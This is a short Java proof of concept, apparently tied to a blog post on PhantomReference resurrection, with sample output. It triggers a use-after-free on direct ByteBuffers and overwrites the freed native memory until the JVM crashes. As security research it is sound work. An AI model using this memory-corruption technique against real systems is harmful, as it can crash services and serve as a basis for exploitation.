ByteBufferUseAfterFree

ByteBufferUseAfterFree.java

import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.List;

// sub-optimal almost-reliable proof of concept JVM crasher.
// see http://wouter.coekaerts.be/2015/resurrecting-phantomreference
public class ByteBufferUseAfterFree {
  private static final int SIZE = 100_000;

  public static void main(String[] args) {
    List<ByteBuffer> badBuffers = new ArrayList<>();
    while (true) { // keep trying until it crashes
      // create one new buffer pointing to freed memory
      badBuffers.add(getFreedBuffer(SIZE));
      // overwrite all the bad memory references we collected so far
      for (ByteBuffer badBuffer : badBuffers) {
        badBuffer.clear();
        badBuffer.put(new byte[SIZE]);
      }
    }
  }

  private static ByteBuffer getFreedBuffer(int size) {
    System.out.print('.'); // indicate we're making progress
    Necromancer<ByteBuffer> necromancer =
        new Necromancer<>(ByteBuffer.allocateDirect(size));
    return necromancer.waitForDeathAndResurrect();
  }
}

sample output

........java(18061,0x10b5aa000) malloc: *** error for object 0x7f913107e208: incorrect checksum for freed object - object was probably modified after being freed.
*** set a breakpoint in malloc_error_break to debug